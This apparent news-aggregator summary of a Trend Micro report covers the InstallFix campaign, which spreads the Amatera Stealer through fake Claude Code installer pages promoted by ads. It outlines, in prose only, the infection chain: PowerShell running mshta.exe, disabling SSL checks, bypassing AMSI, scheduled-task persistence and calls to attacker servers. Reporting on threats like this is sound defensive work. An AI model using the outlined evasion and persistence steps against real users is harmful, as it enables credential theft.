InstallFix campaign spreads malware through fake Claude AI installer pages
Updated
Updated · Trend Micro · May 5
InstallFix campaign spreads malware through fake Claude AI installer pages
5 articles · Updated · Trend Micro · May 5
Trend Micro said the Google Ads-linked campaign hit organisations in the US, Malaysia, Thailand and the Netherlands across government, education, electronics, and food and beverage sectors.
Victims are lured into running PowerShell commands that invoke mshta.exe, disable SSL checks, bypass AMSI, create scheduled tasks for persistence and contact attacker-controlled servers for further payloads.
The report says the operation targets users searching for Claude Code, using realistic OS-specific install instructions and fileless, victim-unique command-and-control URLs that hinder detection and remediation.
As fake AI installers infect both Mac and Windows, what is the next frontier for cross-platform cyberattacks?
Why are ad platforms like Google failing to stop criminals from promoting malware disguised as popular AI tools?
If malware now mimics trusted install commands, is traditional user security training officially obsolete?
InstallFix Exposed: The 2026 Amatera Stealer Epidemic Targeting AI Users via Trusted Infrastructure
Overview
As of May 2026, the InstallFix malware campaign is a major global threat, using advanced tactics to compromise users. Attackers create fake installer pages for popular AI tools like Anthropic’s Claude Code, tricking people into downloading the Amatera Stealer malware. These malicious sites are hosted on trusted platforms such as Cloudflare Pages and Squarespace, helping attackers bypass security systems that rely on domain reputation. This makes the attacks hard to detect and stop, allowing InstallFix to spread widely and steal sensitive information from unsuspecting users around the world.